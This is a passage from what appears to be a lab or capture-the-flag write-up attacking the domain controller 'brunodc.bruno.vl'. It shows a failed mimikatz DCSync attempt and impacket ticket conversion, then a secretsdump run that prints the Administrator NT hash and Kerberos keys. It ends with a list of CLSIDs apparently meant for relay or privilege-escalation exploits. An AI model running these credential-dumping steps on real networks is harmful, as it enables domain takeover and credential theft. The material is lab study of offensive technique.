[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)

mimikatz(commandline) # exit
Bye!
PS C:\Temp> 

Downloading the files and perform DCSync Attack

impacket-ticketConverter "ticket_administrator_to_KRBRELAYUP$@BRUNO.VL.kirbi" administrator.ccache
impacket-ticketConverter "ticket_HOST_brunodc.bruno.vl.kirbi" host.ccache

❯ KRB5CCNAME="host.ccache" impacket-secretsdump -k -no-pass brunodc.bruno.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up... 

CLSIDS working for Windows 2019/2022

c980e4c2-c178-4572-935d-a8a429884806  
90f18417-f0f1-484e-9d3c-59dceee5dbd8  
03ca98d6-ff5d-49b8-abc6-03dd84127020  
d99e6e73-fc88-11d0-b498-00a0c90312f3  
42cbfaa7-a4a7-47bb-b422-bd10e9d02700  
000c101c-0000-0000-c000-000000000046  
1bf48339-d15e-45f3-ad55-a851cb66be6b  
49e6370b-ab71-40ab-92f4-b009539e4518  
50d185b9-fff3-4656-92c7-e4018da4361d  
3c6859ce-230b-484d-be6c-9320c0202408